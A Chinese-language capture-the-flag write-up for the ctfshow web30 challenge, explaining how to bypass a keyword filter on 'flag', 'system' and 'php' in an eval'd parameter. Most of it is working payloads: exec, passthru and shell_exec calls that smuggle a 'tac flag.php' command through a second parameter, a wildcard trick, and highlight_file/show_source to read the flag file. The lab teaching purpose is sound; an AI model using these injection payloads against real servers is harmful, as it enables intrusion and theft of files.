[ctfshow web入门] web30
信息收集
题目将flag system php不区分大小写地过滤了
解题
前置知识
print_r:php中用于打印数组
scandir:php中用于获取指点目录下的所以文件目录名
getcwd:获取当前目录
目录获取
这里提供两种方法
print_r(scandir(getcwd()));
print_r(scandir("."));
获取flag
我只提供一些思路,起到抛砖引玉的作用,我也不可能列举所有的方案
方法1
只过滤$c,我们只要不在c里写那些关键词就可以了
可以在php里执行系统指令的函数有:exec(), system(), passthru(), shell_exec()
这四个函数详细情况参考https://www.jb51.net/program/2850207z8.htm
ban掉了system还有三个,任选一个即可
?c=exec($_GET[1], $a);print_r($a);&1=tac flag.php
?c=passthru($_GET[1]);&1=tac flag.php
?c=echo shell_exec($_GET[1]);&1=tac flag.php
?c=echo shell_exec("tac fla*"); //tac fla?????
方法2
不使用系统指令,使用php函数同样可以
?c=highlight_file($_GET[1]);&1=flag.php
?c=show_source($_GET[1]);&1=flag.php
web 目录 web